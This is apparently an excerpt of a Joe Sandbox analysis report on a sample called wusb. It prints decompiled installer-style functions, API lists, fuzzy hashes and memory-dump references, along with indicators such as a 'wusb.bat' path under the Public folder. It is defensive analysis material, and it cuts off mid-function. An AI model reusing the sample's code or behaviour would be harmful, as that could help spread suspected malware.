                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                        • String ID: %ls=%ls$[Rename]
                                                        • API String ID: 2171350718-461813615
                                                        • Opcode ID: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                                        • Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
                                                        • Opcode Fuzzy Hash: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                                        • Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 100022D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 85%
                                                        			E100022D0(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed int* _t42;
				signed int* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t41;
							goto L12;
						} else {
							_t37 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E10001243();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t42 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t38 =  *_t51;
						_t51[7] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M10002447))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E1000122C(0x10004044);
					goto L10;
				}
			}











                                                        0x100022e4
                                                        0x100022e8
                                                        0x100022f3
                                                        0x100022f3
                                                        0x100022fa
                                                        0x100022ff
                                                        0x00000000
                                                        0x00000000
                                                        0x10002303
                                                        0x10002306
                                                        0x00000000
                                                        0x00000000
                                                        0x1000230b
                                                        0x10002316
                                                        0x10002326
                                                        0x00000000
                                                        0x1000231d
                                                        0x1000231f
                                                        0x10002335
                                                        0x00000000
                                                        0x10002335
                                                        0x1000230d
                                                        0x1000230d
                                                        0x10002336
                                                        0x10002336
                                                        0x10002338
                                                        0x1000233c
                                                        0x1000233c
                                                        0x1000233f
                                                        0x1000233f
                                                        0x10002347
                                                        0x1000234e
                                                        0x10002351
                                                        0x10002410
                                                        0x10002411
                                                        0x1000241c
                                                        0x10002446
                                                        0x10002446
                                                        0x1000242c
                                                        0x10002438
                                                        0x1000242e
                                                        0x1000242e
                                                        0x1000242e
                                                        0x00000000
                                                        0x10002357
                                                        0x10002357
                                                        0x00000000
                                                        0x1000235e
                                                        0x00000000
                                                        0x00000000
                                                        0x10002366
                                                        0x00000000
                                                        0x00000000
                                                        0x10002374
                                                        0x10002376
                                                        0x00000000
                                                        0x00000000
                                                        0x10002397
                                                        0x1000239d
                                                        0x100023a0
                                                        0x100023a2
                                                        0x100023b2
                                                        0x00000000
                                                        0x00000000
                                                        0x1000237f
                                                        0x10002384
                                                        0x10002387
                                                        0x10002388
                                                        0x00000000
                                                        0x00000000
                                                        0x100023be
                                                        0x100023c4
                                                        0x100023c5
                                                        0x100023c8
                                                        0x100023c9
                                                        0x100023cb
                                                        0x00000000
                                                        0x00000000
                                                        0x100023d7
                                                        0x100023da
                                                        0x100023e6
                                                        0x100023e8
                                                        0x00000000
                                                        0x00000000
                                                        0x100023f4
                                                        0x10002400
                                                        0x10002403
                                                        0x10002405
                                                        0x10002408
                                                        0x00000000
                                                        0x00000000
                                                        0x10002357
                                                        0x10002351
                                                        0x1000232b
                                                        0x10002330
                                                        0x00000000
                                                        0x10002330

                                                        APIs
                                                        • GlobalFree.KERNEL32 ref: 10002411
                                                          • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                        • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.677589038.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.677505776.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677602813.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677619149.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                        • String ID: @hhv$@uv
                                                        • API String ID: 4216380887-1609614287
                                                        • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                        • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                        • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                        • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 100024A4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 76%
                                                        			E100024A4(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B4))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}











                                                        0x100024ae
                                                        0x100024b0
                                                        0x100024bf
                                                        0x100024c5
                                                        0x100024d2
                                                        0x100024d4
                                                        0x100024d8
                                                        0x100024d8
                                                        0x100024e0
                                                        0x100024e6
                                                        0x100024e8
                                                        0x00000000
                                                        0x100024ef
                                                        0x00000000
                                                        0x00000000
                                                        0x100024f5
                                                        0x00000000
                                                        0x00000000
                                                        0x100024ff
                                                        0x00000000
                                                        0x00000000
                                                        0x10002506
                                                        0x1000250c
                                                        0x10002518
                                                        0x1000251e
                                                        0x10002523
                                                        0x00000000
                                                        0x00000000
                                                        0x10002545
                                                        0x00000000
                                                        0x00000000
                                                        0x1000252b
                                                        0x10002531
                                                        0x10002532
                                                        0x10002534
                                                        0x00000000
                                                        0x00000000
                                                        0x1000254d
                                                        0x1000254f
                                                        0x10002551
                                                        0x10002553
                                                        0x10002553
                                                        0x00000000
                                                        0x00000000
                                                        0x100024e8
                                                        0x10002556
                                                        0x10002556
                                                        0x1000255b
                                                        0x1000256d
                                                        0x1000256d
                                                        0x10002573
                                                        0x10002578
                                                        0x1000257d
                                                        0x10002589
                                                        0x1000258e
                                                        0x00000000
                                                        0x10002593
                                                        0x1000257f
                                                        0x10002580
                                                        0x10002594
                                                        0x10002594
                                                        0x1000257d
                                                        0x10002595
                                                        0x10002599
                                                        0x1000259c
                                                        0x100025b3

                                                        APIs
                                                          • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                        • GlobalFree.KERNEL32 ref: 1000256D
                                                        • GlobalFree.KERNEL32 ref: 100025A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.677589038.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.677505776.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677602813.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677619149.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc
                                                        • String ID: {v@uv
                                                        • API String ID: 1780285237-3152101019
                                                        • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                        • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                        • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                        • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004064E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E004064E0(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405B94(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405B4A(L"*?|<>/\":", _t5))) == 0) {
							E00405CF9(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                        0x004064e2
                                                        0x004064eb
                                                        0x00406502
                                                        0x00406502
                                                        0x00406509
                                                        0x00406515
                                                        0x00406515
                                                        0x00406518
                                                        0x0040651b
                                                        0x00406520
                                                        0x00406522
                                                        0x0040652b
                                                        0x0040652f
                                                        0x0040654c
                                                        0x00406554
                                                        0x00406554
                                                        0x00406559
                                                        0x0040655b
                                                        0x0040655e
                                                        0x00406563
                                                        0x00406564
                                                        0x00406568
                                                        0x00406568
                                                        0x00406569
                                                        0x00406570
                                                        0x00406572
                                                        0x00406579
                                                        0x00000000
                                                        0x00000000
                                                        0x00406581
                                                        0x00406587
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406587
                                                        0x0040658c

                                                        APIs
                                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\wusb.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,766DFAA0,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                                        • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                                        • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\wusb.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,766DFAA0,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                                        • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\wusb.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,766DFAA0,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\Public\wusb.bat" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-2933255975
                                                        • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                        • Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
                                                        • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                        • Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404248 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00404248(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                        0x0040425a
                                                        0x004042ee
                                                        0x00000000
                                                        0x004042ee
                                                        0x0040426b
                                                        0x0040426f
                                                        0x00000000
                                                        0x00000000
                                                        0x00404275
                                                        0x0040427e
                                                        0x00404281
                                                        0x00404281
                                                        0x00404287
                                                        0x0040428d
                                                        0x0040428d
                                                        0x00404299
                                                        0x0040429f
                                                        0x004042a6
                                                        0x004042a9
                                                        0x004042ac
                                                        0x004042ae
                                                        0x004042ae
                                                        0x004042b6
                                                        0x004042bc
                                                        0x004042bc
                                                        0x004042c6
                                                        0x004042cb
                                                        0x004042ce
                                                        0x004042d3
                                                        0x004042d6
                                                        0x004042d6
                                                        0x004042e6
                                                        0x004042e6
                                                        0x00000000

                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00404265
                                                        • GetSysColor.USER32(00000000), ref: 00404281
                                                        • SetTextColor.GDI32(?,00000000), ref: 0040428D
                                                        • SetBkMode.GDI32(?,?), ref: 00404299
                                                        • GetSysColor.USER32(?), ref: 004042AC
                                                        • SetBkColor.GDI32(?,?), ref: 004042BC
                                                        • DeleteObject.GDI32(?), ref: 004042D6
                                                        • CreateBrushIndirect.GDI32(?), ref: 004042E0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                        • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
                                                        • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                        • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404B7A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00404B7A(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                        0x00404b88
                                                        0x00404b95
                                                        0x00404b9b
                                                        0x00404bd9
                                                        0x00404bd9
                                                        0x00404be8
                                                        0x00404bef
                                                        0x00000000
                                                        0x00404bf1
                                                        0x00404b9d
                                                        0x00404bac
                                                        0x00404bb4
                                                        0x00404bb7
                                                        0x00404bc9
                                                        0x00404bcf
                                                        0x00404bd6
                                                        0x00000000
                                                        0x00404bd6
                                                        0x00000000

                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
                                                        • GetMessagePos.USER32 ref: 00404B9D
                                                        • ScreenToClient.USER32 ref: 00404BB7
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                        • Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
                                                        • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                        • Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 73%
                                                        			E00401DB3(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C15(2);
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				0x40cdb0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40cdc0 = E00402C15(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
